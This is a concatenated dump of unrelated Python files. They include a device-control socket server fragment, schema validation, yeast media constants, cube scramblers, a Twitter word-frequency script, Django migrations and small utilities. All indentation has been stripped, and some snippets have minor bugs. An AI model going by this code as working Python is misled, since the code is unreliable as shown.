# _LOGGER.info("STCP ["+keyv+"/"+str(len(remain))+"/"+str(nb)+"] <-"+remain.encode('hex'))
remain = remain[nb:]
wlist = [self.request]
else:
wlist = []
except: # noqa: E722
_LOGGER.warning(f"{traceback.format_exc()}")
break
_LOGGER.info(keyv + " DISCONNECTED")
serv.unsetclientinfo(self.client_address)
_LOGGER.info(keyv + " DELETED")
self.stop()
class EthSender(object):
__metaclass__ = abc.ABCMeta
def __init__(self):
pass
@abc.abstractmethod
def stop(self):
pass
@abc.abstractmethod
def send_packet(self, addr, packet):
"""Retrieve data from the input source and return an object."""
return -1
class TCPClient(EthSender):
def __init__(self, timeo):
super(TCPClient, self).__init__()
self.timeout = timeo
def stop(self):
pass
def send_packet(self, addr, packet):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect the socket to the port where the server is listening
try:
sock.settimeout(self.timeout)
sock.connect(addr)
sock.sendall(bytearray(packet))
sock.close()
return len(packet)
except: # noqa: E722
_LOGGER.warning(f"{traceback.format_exc()}")
return -1
class HTTPServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
RESP_UNINIT = -1
RESP_WAIT = 0
RESP_OK = 1
def __init__(self, request, client_address, server):
self.resp_status = HTTPServerHandler.RESP_UNINIT
self.resp_val = {}
event.EventManager.on('ActionParsed', self.schedule_response)
SimpleHTTPServer.SimpleHTTPRequestHandler.__init__(
self, request, client_address, server)
def setup(self):
SimpleHTTPServer.SimpleHTTPRequestHandler.setup(self)
self.request.settimeout(60)
def log(self, msg):
_LOGGER.info(
f"[{self.__class__.__name__}] ({self.client_address[0]}:{self.client_address[1]}) -> {msg}")
def schedule_response(self, randid, action, **kwargs):
self.log("action parsed")
if action is not None:
if randid == self.client_address[1]:
self.server.s.schedule_action(randid, self)
self.log("action scheduled")
else:
self.resp_val = {'action': None, 'retval': None}
self.resp_status = HTTPServerHandler.RESP_OK
self.log("schedule_response resp OK")
def write_response_base(self, obj):
self.protocol_version = 'HTTP/1.1'
if 'action' in obj and obj['action'] is not None:
self.send_response(200, 'OK')
else:
self.send_response(403, 'Forbidden')
self.send_header('Content-type', 'application/json')
self.end_headers()
self.wfile.write(s2b(json.dumps(obj)))
def write_response(self, device, action, retval):
self.resp_val = {'action': action, 'retval': retval}
self.resp_status = HTTPServerHandler.RESP_OK
self.log("write_response resp OK")
def do_GET(self):
start_wait = time.time()
self.log(uunq(self.path[1:]))
self.resp_status = HTTPServerHandler.RESP_WAIT
event.EventManager.fire(eventname='ExtInsertAction',
cmdline=str(self.client_address[1]) + " " +
uunq(self.path[1:]), action=None)
while self.resp_status == HTTPServerHandler.RESP_WAIT and not self.server.s.stopped:
time.sleep(0.2)
if time.time() - start_wait > 30:
self.resp_val = {}
break
self.log("write response NOW")
self.write_response_base(self.resp_val)
# Write the response
# self.path = '/'
# return SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
class HTTPServer(threading.Thread):
def __init__(self, tcpport):
super(HTTPServer, self).__init__()
self.port = tcpport
self.server = None
self.stopped = True
self.actions = {}
self.cond = threading.Condition()
self.name = ("HTTPServer")
def stop(self):
if self.server is not None:
self.cond.acquire()
self.stopped = True
self.actions = {}
self.cond.release()
self.server.shutdown()
# self.server.socket.shutdown(SHUT_RDWR)
# self.server.socket.close()
self.server = None
else:
self.stopped = True
def schedule_action(self, randid, client):
if not self.stopped:
self.cond.acquire()
self.actions[str(randid)] = client
self.cond.release()
def run(self):
event.EventManager.on('ActionDone', self.handle_action_done)
self.stopped = False
while not self.stopped:
try:
self.server = SocketServer.ThreadingTCPServer(
("0.0.0.0", self.port), HTTPServerHandler)
break
except: # noqa: E722
_LOGGER.warning(f"{traceback.format_exc()}")
time.sleep(5)
if self.server is not None:
self.server.s = self
self.server.serve_forever()
def handle_action_done(self, device, action, retval, **kwargs):
if not self.stopped:
s = str(action.randomid)
client = None
_LOGGER.info("Searching http client")
self.cond.acquire()
if s in self.actions:
client = self.actions[s]
del self.actions[s]
self.cond.release()
if client is not None:
client.log("Client found")
client.write_response(device, action, retval)
class TCPServer(threading.Thread):
def __init__(self, tcpport):
super(TCPServer, self).__init__()
SocketServer.TCPServer.allow_reuse_address = True
self.port = tcpport
self.server = None
self.stopped = True
self.towrite = {}
self.cond = threading.Condition()
self.clientinfo = {}
self.clienthandler = {}
self.timer = None
self.name = ("TCPServer")
def stop(self):
if self.server is not None:
self.cond.acquire()
self.stopped = True
self.towrite = {}
self.cond.release()
self.clientinfo = {}
self.clienthandler = {}
self.server.shutdown()
# self.server.socket.shutdown(SHUT_RDWR)
# self.server.socket.close()
self.server = None
if self.timer is not None:
self.timer.cancel()
self.timer = None
else:
self.stopped = True
def setclientinfo(self, addr, dictout):
keyv = '{}:{}'.format(*addr)
self.cond.acquire()
self.clientinfo[keyv] = dictout
self.cond.release()
def setclienthandler(self, addr, handler):
keyv = '{}:{}'.format(*addr)
self.cond.acquire()
self.clienthandler[keyv] = handler
self.cond.release()
def getclientinfo(self, addr):
self.cond.acquire()
keyv = '{}:{}'.format(*addr)
if keyv in self.clientinfo:
ci = self.clientinfo[keyv]
else:
ci = {'addr': addr}
self.cond.release()
return ci
def unsetclientinfo(self, addr):
self.cond.acquire()
keyv = '{}:{}'.format(*addr)
# _LOGGER.info("02_unsetting %s" %keyv)
if keyv in self.towrite:
# _LOGGER.info("02_found in towrite")
for x in self.towrite[keyv]:
if isinstance(x, SendBufferTimer):
x.set_finished(None)
# _LOGGER.info("02_setfinish")
del self.towrite[keyv]
if keyv in self.clientinfo:
# _LOGGER.info("02_found in clientinfo")
del self.clientinfo[keyv]
if keyv in self.clienthandler:
# _LOGGER.info("02_found in clienthandler")
self.clienthandler[keyv].stop()
del self.clienthandler[keyv]
self.cond.release()
def handle_action_done(self, device, action, retval, **kwargs):
if isinstance(action, ActionPing) and self.timer is not None:
self.timer_ping_init()
threading.currentThread().name = ("handle_action_done")
strout = json.dumps({'action': action, 'retval': retval}) + '\n'
if device is not None and action is not None:
lst = action.mqtt_publish_onfinish(retval)
lst.extend(device.mqtt_publish_onfinish(action, retval))
device.mqtt_publish_all(lst)
self.schedulewrite(strout)
def timer_ping_init(self):
if self.timer is not None:
self.timer.cancel()
self.timer = threading.Timer(
60, self.handle_action_done, (None, ActionPing(), 1,))
self.timer.name = ("timerping")
self.timer.daemon = True
self.timer.start()
def run(self):
event.EventManager.on('ActionDone', self.handle_action_done)
self.stopped = False
self.timer_ping_init()
while not self.stopped:
try:
self.server = SocketServer.ThreadingTCPServer(
("0.0.0.0", self.port), TCPServerHandler)
break
except: # noqa: E722
_LOGGER.warning(f"{traceback.format_exc()}")
time.sleep(5)
if self.server is not None:
self.server.s = self
self.server.serve_forever()
def dowrite(self, addr):
snd = b''
self.cond.acquire()
keyv = '{}:{}'.format(*addr)
if not self.stopped and keyv in self.clientinfo and keyv in self.towrite:
while len(snd) == 0 and len(self.towrite[keyv]) > 0:
snd = self.towrite[keyv][0]
if isinstance(snd, (bytes, str)):
snd = s2b(self.towrite[keyv].pop(0))
# _LOGGER.info("01_1")
elif snd.timer is not None: # dobbiamo aspettare la risposta
snd = b''
# _LOGGER.info("01_2")
break
elif snd.has_succeeded() or snd.has_failed():
if "sender" in self.clientinfo[keyv]:
del self.clientinfo[keyv]['sender']
if snd.has_failed():
self.clientinfo[keyv]['disconnecttimer'] = time.time()
self.towrite[keyv].pop(0)
snd = b''
# _LOGGER.info("01_3")
else: # dobbiamo ancora spedire il pacchetto o c'e gia stato un timeout ma dobbiamo fare altri tentativi
snd.clientinfo = self.clientinfo[keyv]
self.clientinfo[keyv]['sender'] = snd
snd = snd.schedule()
# _LOGGER.info("01_4")
self.cond.release()
return snd
def innerschedule(self, keyv, w):
if keyv not in self.towrite:
self.towrite[keyv] = []
if isinstance(w, list):
self.towrite[keyv].extend(w)
else:
self.towrite[keyv].append(w)
def get_connected_clients(self):
lst = dict()
for _, v in self.clientinfo.items():
if 'device' in v:
keyv = '{}:{}'.format(*(v['hp']))
lst[keyv] = v['device']
return lst
def schedulewrite(self, w):
exitv = False
if not self.stopped and self.server is not None:
self.cond.acquire()
if not isinstance(w, SendBufferTimer):
for keyv, v in self.clientinfo.items():
if v['type'] == b'mfz':
self.innerschedule(keyv, w)
exitv = True
else:
keyv = '{}:{}'.format(*(w.addr))
if keyv not in self.clientinfo:
for keyv, v in self.clientinfo.items():
if 'mac' in v and v['mac'] == w.mac:
self.innerschedule(keyv, w)
exitv = True
break
else:
exitv = True
self.innerschedule(keyv, w)
self.cond.release()
return exitv
class EthBuffCont(object):
def __init__(self, ad, d):
self.data = d
self.addr = ad
class ListenerTh(threading.Thread, EthSender):
def send_packet(self, addr, packet):
try:
return self.socket.sendto(bytearray(packet), addr)
except: # noqa: E722
_LOGGER.warning(f"{traceback.format_exc()}")
return -1
def __init__(self, port, *args, **kwargs):
super(ListenerTh, self).__init__(*args, **kwargs)
self.port = port
self.stopped_ev = threading.Event()
self.stopped_ev.set()
self.preparse = RoughParser()
self.socket = None
self.stopped = True
self.name = ("ListenerTh")
def stop(self):
if self.socket:
self.stopped = True
self.socket.sendto(bytearray(b'a'), ('127.0.0.1', self.port))
self.stopped_ev.wait()
self.socket.close()
self.socket = None
def run(self):
""" Listen on socket. """
self.stopped_ev.clear()
try:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
for opt in [socket.SO_BROADCAST, socket.SO_REUSEADDR]:
self.socket.setsockopt(socket.SOL_SOCKET, opt, 1)
self.socket.bind(('', self.port))
self.stopped = False
while not self.stopped:
try:
_LOGGER.info('enterrecv')
data, addr = self.socket.recvfrom(1024)
_LOGGER.info('1) recv %d (%s:%d) ' % (0 if not data else len(
data), 'unkn' if not addr else addr[0], 0 if not addr else addr[1]))
if data is not None and len(data):
self.preparse.parse(
addr, data if data[0:1] != b'@' else data + b'\n')['idxout']
_LOGGER.info('exitrecv')
except: # noqa: E722
_LOGGER.warning(f"{traceback.format_exc()}")
break
except: # noqa: E722
_LOGGER.warning(f"{traceback.format_exc()}")
self.stopped_ev.set()
class UdpManager(object):
def __init__(self, options):
self.port = options.port
self.retry = options.retry
self.timeout = options.timeout
self.broadcast_address = options.broadcast
self.remote = options.remote
self.listener = None
self.sender = None
self.buffer = {}
self.buffer_l = None
def add_to_buffer(self, key, hp, data, **kwargs):
self.buffer_l.acquire()
self.buffer[key] = EthBuffCont(hp, data)
self.buffer_l.notifyAll()
self.buffer_l.release()
def _udp_transact(self, hp, payload, handler, action, keyfind, timeout=-1, **kwargs):
""" Complete a UDP transaction.
UDP is stateless and not guaranteed, so we have to
take some mitigation steps:
- Send payload multiple times.
- Wait for awhile to receive response.
:param payload: Payload to send.
:param handler: Response handler.
:param args: Arguments to pass to response handler.
:param broadcast: Send a broadcast instead.
:param timeout: Timeout in seconds.
"""
u = self
keyv = keyfind(hp, payload)
u.buffer_l.acquire()
host = hp[0]
broadcast = host is None or (len(host) > 4 and host[-4:] == '.255')
if broadcast:
u.buffer.clear()
elif keyv in u.buffer:
del u.buffer[keyv]
u.buffer_l.release()
if timeout is None or timeout < 0:
timeout = u.timeout
if broadcast or u.remote:
host = u.broadcast_address
retval = None
hp2 = (host, u.port if not u.remote or hp[1] <= 0 else hp[1])
for dd in range(u.retry):
if len(payload) > 0 and retval != RV_DATA_WAIT:
try:
self.sender.send_packet(hp2, payload)
_LOGGER.info(f"S [{hp[0]}:{hp[1]}] -> {tohexs(payload)}")
except: # noqa: E722
_LOGGER.warning(f"{traceback.format_exc()}")
return None
if handler is None:
return 5
elif broadcast:
# _LOGGER.info('broadc')
time.sleep(timeout)
break
else:
# _LOGGER.info('no broadc')
u.buffer_l.acquire()
# _LOGGER.info('acquired')
buffcont = u.buffer.get(keyv, None)
if buffcont is None:
now = time.time()
once = False
while time.time() < now + timeout or not once:
# _LOGGER.info("waiting")
u.buffer_l.wait(timeout)
# _LOGGER.info("waiting f")
once = True
buffcont = u.buffer.get(keyv, None)
if buffcont is not None or u.listener is None:
break
u.buffer_l.release()
if u.listener is None:
return None
elif buffcont:
retval = handler(buffcont.addr, action,
buffcont.data, **kwargs)
# _LOGGER.info('Handler returned '+str(retval))
# Return as soon as a response is received
if retval is not None and retval != RV_DATA_WAIT:
break
else:
u.buffer_l.acquire()
del u.buffer[keyv]
u.buffer_l.release()
if retval == RV_DATA_WAIT:
dd -= 1
else:
retval = None
if broadcast:
u.buffer_l.acquire()
retval = handler(None, action, u.buffer, **kwargs)
u.buffer_l.release()
return retval
def configure(self):
if self.buffer_l is None:
self.buffer_l = threading.Condition()
self.listener = ListenerTh(self.port)
self.listener.start()
self.sender = self.listener if not self.remote else TCPClient(
self.timeout)
event.EventManager.on('RawDataReceived', self.add_to_buffer)
def stop(self):
if self.listener is not None:
_LOGGER.info("Stopping Listener Thread")
self.listener.stop()
_LOGGER.info("Listener Thread Stopped")
self.listener = None
if self.sender is not None:
_LOGGER.info("Stopping Sender")
self.sender.stop()
_LOGGER.info("Sender Stopped")
|
StarcoderdataPython
|
1657870
|
import basic_type
from schema_dsl_common import *
def _check_object_type(input_object, path):
if not isinstance(input_object, dict):
raise TypeError(get_message(path, 'Should be an object'))
def _get_unrecognized_message(diff_set):
diff = list(diff_set)
if len(diff) == 1:
return 'Unrecognized field: ' + diff[0]
return 'Unrecognized fields: ' + ', '.join([x for x in diff])
def _check_redundancy(input_object, path, field_name_set):
input_key_set = set(input_object.keys())
if not input_key_set <= field_name_set:
msg = _get_unrecognized_message(input_key_set - field_name_set)
raise ValueError(get_message(path, msg))
def _validate_incoming_object(input_object, path, field_name_set):
if input_object is None:
return None
_check_object_type(input_object, path)
_check_redundancy(input_object, path, field_name_set)
def _process_field(field, parent, input_object):
path = parent + [field['name']]
result = convert(field['field_type'], input_object, path)
return reduce(lambda res, f: f(res, path), field['filters'], result)
def _collect_object_result(input_object, path, fields):
result = {}
for field in fields:
field_name = field['name']
if field_name in input_object:
result[field_name] = _process_field(field, path, input_object[field_name])
else:
result[field_name] = _process_field(field, path, None)
return result
def _convert_object(schema, input_object, path):
path = path or []
field_name_set = set([x['name'] for x in schema['fields']])
_validate_incoming_object(input_object, path, field_name_set)
if input_object is None:
return None
return _collect_object_result(input_object, path, schema['fields'])
def _check_array_type(input_object, path):
if not isinstance(input_object, list):
raise TypeError(get_message(path, 'Should be an array'))
def _validate_array(input_object, path):
if input_object is None:
return
_check_array_type(input_object, path)
def _filter_array_element(input_object, path, element_type, filters):
result = convert(element_type, input_object, path)
return reduce(lambda res, f: f(res, path), filters, result)
def _collect_array_result(input_object, path, element_type, filters):
return [_filter_array_element(input_object[i], path + [str(i)], element_type, filters) for i in
xrange(len(input_object))]
def _convert_array(schema, input_object, path):
path = path or []
_validate_array(input_object, path)
if input_object is None:
return None
return _collect_array_result(input_object, path, schema['element_type'], schema['filters'])
def _convert_either(schema, input_object, path):
for data_type in schema['types']:
try:
return convert(data_type, input_object, path)
except ValueError:
pass
except TypeError:
pass
raise ValueError(get_message(path, 'Invalid value'))
def _schema_wrap(converter):
def f(schema, input_object, path):
return converter(input_object, path)
return f
TYPE_FUNCTION_MAP = {
'String': _schema_wrap(basic_type.string_type),
'Integer': _schema_wrap(basic_type.integer_type),
'Number': _schema_wrap(basic_type.number_type),
'Boolean': _schema_wrap(basic_type.boolean_type),
'StringMap': _schema_wrap(basic_type.string_map),
'Object': _convert_object,
'Array': _convert_array,
'Either': _convert_either
}
def convert(schema, input_object, path=None):
path = path or []
return TYPE_FUNCTION_MAP[schema['type']](schema, input_object, path)
|
StarcoderdataPython
|
152303
|
"""
Defines upper bounds of in silico SD media used by Szappanos et al., 2011
"""
from yeast.core.media.constants import reagents
from yeast.core.media.sd.base import sd
szappanos = {
reagents["oxygen"]: 6.3,
reagents["sulphite"]: 100.0,
reagents["phosphate"]: 0.89,
# Carbon
reagents["D-glucose"]: 22.6,
# AA
reagents["L-alanine"]: 0.36,
reagents["L-asparagine"]: 0.36,
reagents["L-aspartate"]: 0.36,
reagents["L-cysteine"]: 0.36,
reagents["L-glutamate"]: 3.6,
reagents["L-glutamine"]: 0.36,
reagents["L-glycine"]: 0.36,
reagents["L-isoleucine"]: 0.36,
reagents["L-leucine"]: 1.8,
reagents["L-methionine"]: 0.36,
reagents["L-phenylalanine"]: 0.36,
reagents["L-proline"]: 0.36,
reagents["L-serine"]: 0.36,
reagents["L-threonine"]: 0.36,
reagents["L-tryptophan"]: 0.36,
reagents["L-tyrosine"]: 0.36,
reagents["L-valine"]: 0.36,
reagents["potassium"]: 4.44,
reagents["sodium"]: 0.75,
reagents["biotin"]: 0.00000142,
reagents["choline"]: 0.00437,
reagents["riboflavin"]: 0.00092,
reagents["thiamine(1+)"]: 0.0032,
reagents["myo-inositol"]: 0.11,
reagents["nicotinate"]: 0.000002,
reagents["4-aminobenzoate"]: 0.000002,
reagents["(R)-pantothenate"]: 0.0002,
# NT
reagents["uracil"]: 3.63,
reagents["adenine"]: 3.01,
}
sdszappanos = {**sd, **szappanos}
|
StarcoderdataPython
|
1740568
|
<reponame>raghav-vish/cubescramble
import random
def scramble3(length=-1, number=1, gen2=False):
ret=[]
for loop in range(number):
scr=''
moves=['R', 'L', 'U', 'D', 'F', 'B']
if(gen2):
moves=['R', 'U']
sides=["", "'", "2"]
prevmov=-1
num=-1
if(length==-1):
lent=random.randint(15, 25)
else:
lent=length
for i in range(lent):
while(num==prevmov):
num=random.randint(0,5)
if(gen2):
num=random.randint(0,1)
side=random.randint(0,2)
prevmov=num
scr+=moves[num]+sides[side]+' '
scr=scr[:-1]
ret.append(scr)
if(len(ret)==1):
return ret[0]
return ret
def scramble2(length=-1, number=1):
ret=[]
for loop in range(number):
scr=''
moves=['R', 'F', 'U']
sides=["", "'", "2"]
prevmov=-1
num=-1
if(length==-1):
lent=random.randint(8, 13)
else:
lent=length
for i in range(lent):
while(num==prevmov):
num=random.randint(0,2)
side=random.randint(0,2)
prevmov=num
scr+=moves[num]+sides[side]+' '
scr=scr[:-1]
ret.append(scr)
if(len(ret)==1):
return ret[0]
return ret
def scramble4(length=-1, number=1):
ret=[]
for loop in range(number):
scr=''
moves=['R', 'L', 'U', 'D', 'F', 'B', 'Rw', 'Lw', 'Uw', 'Dw', 'Fw', 'Bw']
sides=["", "'", "2"]
prevmov=-1
num=-1
if(length==-1):
lent=random.randint(38, 52)
else:
lent=length
for i in range(lent):
while(num==prevmov):
num=random.randint(0,11)
side=random.randint(0,2)
prevmov=num
scr+=moves[num]+sides[side]+' '
scr=scr[:-1]
ret.append(scr)
if(len(ret)==1):
return ret[0]
return ret
def scramble5(length=-1, number=1):
ret=[]
for loop in range(number):
scr=''
moves=['R', 'L', 'U', 'D', 'F', 'B', 'Rw', 'Lw', 'Uw', 'Dw', 'Fw', 'Bw']
sides=["", "'", "2"]
prevmov=-1
num=-1
if(length==-1):
lent=random.randint(38, 52)
else:
lent=length
for i in range(lent):
while(num==prevmov):
num=random.randint(0,11)
side=random.randint(0,2)
prevmov=num
scr+=moves[num]+sides[side]+' '
scr=scr[:-1]
ret.append(scr)
if(len(ret)==1):
return ret[0]
return ret
|
StarcoderdataPython
|
3326846
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2020 <NAME> <https://github.com/rzhw>. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fetch a Twitter list, use it to generate frequency of Japanese vocabulary
"""
from collections import OrderedDict
import json
import sys
import nagisa
import regex
import twitter
from t import ACCESS_TOKEN_KEY, ACCESS_TOKEN_SECRET, CONSUMER_KEY, CONSUMER_SECRET, LIST_ID
def get_timeline(max_id=None):
if max_id:
return api.GetListTimeline(list_id=LIST_ID, max_id=max_id, count=200)
return api.GetListTimeline(list_id=LIST_ID, count=200)
def get_tweets(api=None, screen_name=None):
timeline = []
earliest_tweet = None
for i in range(20):
tweets = get_timeline(earliest_tweet)
new_earliest = min(tweets, key=lambda x: x.id).id
if not tweets or new_earliest == earliest_tweet:
break
else:
earliest_tweet = new_earliest
print("getting tweets before:", earliest_tweet)
timeline += tweets
return timeline
def validate_japanese(word):
return (not regex.match(r'^\s*$', word) and not regex.match(r'\W', word)
and regex.match(r'\p{Hiragana}|\p{Katakana}|\p{Han}', word))
if __name__ == "__main__":
api = twitter.Api(CONSUMER_KEY, CONSUMER_SECRET, ACCESS_TOKEN_KEY,
ACCESS_TOKEN_SECRET)
screen_name = sys.argv[1]
print(screen_name)
timeline = get_tweets(api=api, screen_name=screen_name)
all_together = ''
for tweet in timeline:
all_together += tweet.text + "\n"
print("hello")
taggings = nagisa.filter(all_together,
filter_postags=[
'補助記号', '空白', '助詞', '助動詞', '記号', 'URL', '英単語',
'ローマ字文'
])
freq = {}
for word in filter(validate_japanese, taggings.words):
freq[word] = freq.get(word, 0) + 1
# Sort by value
sorted_freq = OrderedDict(sorted(freq.items(), key=lambda x: x[1]),
reverse=True)
output = "Word,Count\n"
for key, value in sorted_freq.items():
output += "%s,%d\n" % (key, value)
with open('output.csv', 'w+') as f:
f.write(output)
|
StarcoderdataPython
|
1690539
|
<filename>django_spanner/client.py
# Copyright 2020 Google LLC
#
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file or at
# https://developers.google.com/open-source/licenses/bsd
from django.db.backends.base.client import BaseDatabaseClient
from google.cloud.spanner_dbapi.exceptions import NotSupportedError
class DatabaseClient(BaseDatabaseClient):
def runshell(self, parameters):
raise NotSupportedError("This method is not supported.")
|
StarcoderdataPython
|
160276
|
<gh_stars>0
# -*- coding: utf-8 -*-
# Generated by Django 1.11.22 on 2019-07-09 23:09
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('js_locations', '0006_location_featured_image'),
]
operations = [
migrations.AddField(
model_name='location',
name='nofollow',
field=models.BooleanField(default=False, verbose_name='nofollow'),
),
migrations.AddField(
model_name='location',
name='noindex',
field=models.BooleanField(default=False, verbose_name='noindex'),
),
migrations.AddField(
model_name='location',
name='show_on_sitemap',
field=models.BooleanField(default=True, verbose_name='Show on sitemap'),
),
migrations.AddField(
model_name='location',
name='show_on_xml_sitemap',
field=models.BooleanField(default=True, verbose_name='Show on xml sitemap'),
),
]
|
StarcoderdataPython
|
3310234
|
# Generated by Django 3.0.3 on 2020-03-24 18:37
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('study', '0004_remove_student_rating'),
]
operations = [
migrations.CreateModel(
name='Course',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30)),
('description', models.TextField()),
('subject', models.CharField(max_length=4)),
('course_number', models.CharField(max_length=4)),
],
),
migrations.CreateModel(
name='Tutor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=300)),
('last_name', models.CharField(max_length=300)),
('picture', models.URLField()),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.RemoveField(
model_name='student',
name='email',
),
migrations.AlterField(
model_name='student',
name='bio',
field=models.TextField(blank=True, max_length=200),
),
migrations.CreateModel(
name='tutorRequest',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('description', models.TextField()),
('course', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='study.Course')),
('student', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='study.Student')),
('tutor', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='study.Tutor')),
],
),
]
|
StarcoderdataPython
|
29804
|
<gh_stars>10-100
import csv
import json
def pair_entity_ratio(found_pair_set_len, entity_count):
return found_pair_set_len / entity_count
def precision_and_recall(found_pair_set, pos_pair_set, neg_pair_set=None):
# if a neg_pair_set is provided,
# consider the "universe" to be only the what's inside pos_pair_set and neg_pair_set,
# because this means a previous blocking was applied
if neg_pair_set is not None:
found_pair_set = found_pair_set & (pos_pair_set | neg_pair_set)
true_positives = found_pair_set & pos_pair_set
false_positives = found_pair_set - pos_pair_set
if true_positives:
precision = len(true_positives) / (len(true_positives) + len(false_positives))
else:
precision = 0.0
recall = len(true_positives) / len(pos_pair_set)
return precision, recall
def f1_score(precision, recall):
if precision or recall:
return (2 * precision * recall) / (precision + recall)
else:
return 0.0
def evaluate_output_json(
unlabeled_csv_filepath, output_json_filepath, pos_pair_json_filepath, csv_encoding="utf-8"
):
with open(
unlabeled_csv_filepath, "r", newline="", encoding=csv_encoding
) as record_dict_csv_file:
record_count = sum(1 for __ in csv.DictReader(record_dict_csv_file))
with open(output_json_filepath, "r") as f:
found_pair_set = json.load(f)
found_pair_set = set(tuple(t) for t in found_pair_set)
with open(pos_pair_json_filepath, "r") as f:
pos_pair_set = json.load(f)
pos_pair_set = set(tuple(t) for t in pos_pair_set)
precision, recall = precision_and_recall(found_pair_set, pos_pair_set)
return (
precision,
recall,
f1_score(precision, recall),
pair_entity_ratio(len(found_pair_set), record_count),
)
|
StarcoderdataPython
|
180070
|
from geventwebsocket.handler import WebSocketHandler
class DjangoWebSocketHandler(WebSocketHandler):
def run_websocket(self):
"""
Just run the websocket request on the application. Dont use client
tracking because we are using unix domain sockets and the client addr
is the same for every socket.
"""
try:
self.application(self.environ, lambda s, h, e=None: [])
finally:
# not sure all this tidy up is necessary
self.environ.update({'wsgi.websocket': None})
if not self.websocket.closed:
self.websocket.close()
self.websocket = None
@property
def active_client(self):
"""
Since we are tracking clients return None here.
"""
return
|
StarcoderdataPython
|
71834
|
# -*- coding: utf-8 -*-
"""Tests for the redirect.py script."""
#
# (C) Pywikibot team, 2017
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, unicode_literals
try:
from unittest.mock import Mock, patch
except ImportError:
from mock import Mock, patch
import pywikibot
from pywikibot import site, Page, i18n
from scripts.redirect import RedirectRobot
from tests.aspects import DefaultSiteTestCase
# To make `self.site.logged_in(sysop=True)` always return False
@patch.object(site.APISite, 'logged_in', new=Mock(return_value=False))
@patch.object(Page, 'exists', new=Mock(return_value=True))
class TestGetSDTemplateNoSysop(DefaultSiteTestCase):
"""Test the get_sd_template method of the RedirectRobot class."""
def test_with_delete_and_existing_sdtemplate(self):
"""Test with delete and existing sdtemplate."""
options = {'delete': True, 'sdtemplate': '{{t}}'}
bot = RedirectRobot('broken', **options)
self.assertEqual(bot.sdtemplate, '{{t}}')
@patch.object(i18n, 'twhas_key', new=Mock(return_value=True))
@patch.object(i18n, 'twtranslate', new=Mock(return_value='{{sd_title}}'))
def test_with_delete_and_i18n_sd(self):
"""Test with delete and i18n template."""
bot = RedirectRobot('broken', delete=True)
self.assertEqual(bot.sdtemplate, '{{sd_title}}')
@patch.object(i18n, 'twhas_key', new=Mock(return_value=False))
def test_with_delete_no_sd_no_i18n(self):
"""Test with delete and no i18n template."""
with patch.object(pywikibot, 'warning') as w:
bot = RedirectRobot('broken', delete=True)
w.assert_called_with('No speedy deletion template available.')
self.assertEqual(bot.sdtemplate, None)
def test_with_delete_and_non_existing_sdtemplate(self):
"""Test with delete and non-exisitng sdtemplate."""
options = {'delete': True, 'sdtemplate': 'txt {{n|a}} txt'}
with patch.object(Page, 'exists', new=Mock(return_value=False)):
with patch.object(pywikibot, 'warning') as w:
bot = RedirectRobot('broken', **options)
w.assert_called_with('No speedy deletion template "n" available.')
self.assertEqual(bot.sdtemplate, None)
|
StarcoderdataPython
|
1640086
|
<reponame>deniskolokol/anywhere
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from osgeo import ogr
def filter_file(filter_func, infile, outfile):
"""
Saves all infile shapes which pass through filter_func to outfile.
Example:
filter_file(lambda x: x.GetField('ISO2') == 'CZ', 'TM_WORLD_BORDERS-0.3.shp', 'cz.shp')
"""
driver = ogr.GetDriverByName('ESRI Shapefile')
inDS = driver.Open(infile)
inLayer = inDS.GetLayer()
outDS = driver.CreateDataSource(outfile)
outLayer = outDS.CreateLayer('filtered')
feat = inLayer.GetFeature(0) # first feature
for field in feat.keys():
outLayer.CreateField(feat.GetFieldDefnRef(field))
del feat
featureDefn = outLayer.GetLayerDefn()
for i in range(inLayer.GetFeatureCount()):
feat = inLayer.GetFeature(i)
if not filter_func(feat):
continue
outFeature = ogr.Feature(featureDefn)
outFeature.SetGeometry(feat.GetGeometryRef())
for field in feat.keys():
outFeature.SetField(field, feat.GetField(field))
outLayer.CreateFeature(outFeature)
|
StarcoderdataPython
|
64685
|
import platform
import os
import logging.handlers
from lbrynet import build_type, __version__ as lbrynet_version
log = logging.getLogger(__name__)
def get_platform() -> dict:
p = {
"processor": platform.processor(),
"python_version": platform.python_version(),
"platform": platform.platform(),
"os_release": platform.release(),
"os_system": platform.system(),
"lbrynet_version": lbrynet_version,
"build": build_type.BUILD, # CI server sets this during build step
}
if p["os_system"] == "Linux":
import distro
p["distro"] = distro.info()
p["desktop"] = os.environ.get('XDG_CURRENT_DESKTOP', 'Unknown')
return p
|
StarcoderdataPython
|
3376507
|
<filename>loops.py
largest = None
smallest = None
val=None
while True:
num = raw_input('Enter a number :')
try:
val=int(num)
except:
print "Invalid input"
if num == "done" : break
if largest is None :
largest=val
if smallest is None :
smallest=val
if val>largest :
largest=val
if val<smallest :
smallest=val
print "Maximum is", largest
print "Minimum is", smallest
|
